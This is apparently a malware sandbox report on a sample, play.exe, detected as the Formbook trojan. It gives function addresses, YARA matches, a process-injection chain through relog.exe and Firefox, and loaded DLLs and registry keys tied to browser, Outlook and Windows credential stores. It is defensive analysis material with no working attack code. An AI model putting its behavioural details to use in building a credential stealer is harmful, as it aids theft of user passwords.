Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039706E5	4_2_039706E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0399138F	4_2_0399138F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397073F	4_2_0397073F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039726BF	4_2_039726BF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03978E1F	4_2_03978E1F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03972496	4_2_03972496
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397249F	4_2_0397249F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397AC3F	4_2_0397AC3F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330A352	5_2_0330A352
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325E3F0	5_2_0325E3F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033103E6	5_2_033103E6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F0274	5_2_032F0274
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032D02C0	5_2_032D02C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03240100	5_2_03240100
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032EA118	5_2_032EA118
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032D8158	5_2_032D8158
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033041A2	5_2_033041A2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033101AA	5_2_033101AA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033081CC	5_2_033081CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032E2000	5_2_032E2000
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250770	5_2_03250770
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03274750	5_2_03274750
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324C7C0	5_2_0324C7C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326C6E0	5_2_0326C6E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250535	5_2_03250535
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03310591	5_2_03310591
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F4420	5_2_032F4420
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03302446	5_2_03302446
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FE4F6	5_2_032FE4F6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330AB40	5_2_0330AB40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03306BD7	5_2_03306BD7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324EA80	5_2_0324EA80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03266962	5_2_03266962
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032529A0	5_2_032529A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0331A9A6	5_2_0331A9A6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03252840	5_2_03252840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325A840	5_2_0325A840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032368B8	5_2_032368B8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0327E8F0	5_2_0327E8F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03292F28	5_2_03292F28
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03270F30	5_2_03270F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F2F30	5_2_032F2F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C4F40	5_2_032C4F40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032CEFA0	5_2_032CEFA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03242FC8	5_2_03242FC8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330EE26	5_2_0330EE26
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250E59	5_2_03250E59
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330CE93	5_2_0330CE93
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03262E90	5_2_03262E90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330EEDB	5_2_0330EEDB
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325AD00	5_2_0325AD00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032ECD1F	5_2_032ECD1F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03268DBF	5_2_03268DBF
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324ADE0	5_2_0324ADE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250C00	5_2_03250C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F0CB5	5_2_032F0CB5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03240CF2	5_2_03240CF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330132D	5_2_0330132D
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0323D34C	5_2_0323D34C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0329739A	5_2_0329739A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032552A0	5_2_032552A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F12ED	5_2_032F12ED
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326D2F0	5_2_0326D2F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326B2C0	5_2_0326B2C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0328516C	5_2_0328516C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0323F172	5_2_0323F172
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0331B16B	5_2_0331B16B
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325B1B0	5_2_0325B1B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F0E0	5_2_0330F0E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033070E9	5_2_033070E9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FF0CC	5_2_032FF0CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032570C0	5_2_032570C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F7B0	5_2_0330F7B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03295630	5_2_03295630
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033016CC	5_2_033016CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307571	5_2_03307571
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032ED5B0	5_2_032ED5B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033195C3	5_2_033195C3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F43F	5_2_0330F43F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03241460	5_2_03241460
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FB76	5_2_0330FB76
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326FB80	5_2_0326FB80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0328DBF9	5_2_0328DBF9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C5BF0	5_2_032C5BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C3A6C	5_2_032C3A6C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307A46	5_2_03307A46
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FA49	5_2_0330FA49
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032EDAAC	5_2_032EDAAC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03295AA0	5_2_03295AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F1AA3	5_2_032F1AA3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FDAC6	5_2_032FDAC6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032E5910	5_2_032E5910
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03259950	5_2_03259950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326B950	5_2_0326B950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032BD800	5_2_032BD800
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032538E0	5_2_032538E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FF09	5_2_0330FF09
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FFB1	5_2_0330FFB1
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03251F92	5_2_03251F92
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03213FD2	5_2_03213FD2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03213FD5	5_2_03213FD5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03259EB0	5_2_03259EB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307D73	5_2_03307D73
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03253D40	5_2_03253D40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03301D5A	5_2_03301D5A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326FDC0	5_2_0326FDC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C9C32	5_2_032C9C32
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FCF2	5_2_0330FCF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C1DB0	5_2_008C1DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCCC7	5_2_008BCCC7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCCD0	5_2_008BCCD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCEF0	5_2_008BCEF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BAF70	5_2_008BAF70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C5470	5_2_008C5470
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C3650	5_2_008C3650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008DBBC0	5_2_008DBBC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E308	5_2_0310E308
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E7BC	5_2_0310E7BC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310D7F4	5_2_0310D7F4
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E423	5_2_0310E423
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310CAAA	5_2_0310CAAA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310D828	5_2_0310D828
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0532374F	6_2_0532374F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530CFFF	6_2_0530CFFF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530993F	6_2_0530993F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530B1DF	6_2_0530B1DF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05304856	6_2_05304856
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530485F	6_2_0530485F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05304A7F	6_2_05304A7F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05302AFF	6_2_05302AFF
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364AAAA	7_2_000001917364AAAA
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C308	7_2_000001917364C308
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C7BC	7_2_000001917364C7BC
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364B828	7_2_000001917364B828
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C423	7_2_000001917364C423
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364B7F4	7_2_000001917364B7F4

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 03297E54 appears 107 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 032CF290 appears 103 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 0323B970 appears 262 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 03285130 appears 58 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 032BEA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0268B970 appears 262 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0270EA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 026D5130 appears 58 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0271F290 appears 103 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 026E7E54 appears 107 times

Sample file is different than original file name gathered from version info

Source: play.exe, 00000000.00000002.2062190338.0000000002931000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \VarFileInfo\TranslationProductVersion\StringFileInfo\%04x%04x\%sOriginalFilename vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRelog.exej% vs play.exe
Source: play.exe, 00000000.00000003.1957582944.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.1959294394.00000000025E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe

Uses 32bit PE files

Source: play.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: play.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@17/14

Source: C:\Windows\SysWOW64\relog.exe

File created: C:\Users\user\AppData\Local\Temp\--x702s3

Jump to behavior

Source: play.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\play.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: relog.exe, 00000005.00000002.4103860914.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4103860914.0000000002D22000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: play.exe	ReversingLabs: Detection: 55%
Source: play.exe	Virustotal: Detection: 58%

Source: unknown	Process created: C:\Users\user\Desktop\play.exe "C:\Users\user\Desktop\play.exe"
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\play.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: play.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: relog.pdbGCTL source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aAqvujXSGNo.exe, 00000004.00000000.1976786977.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4103761428.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
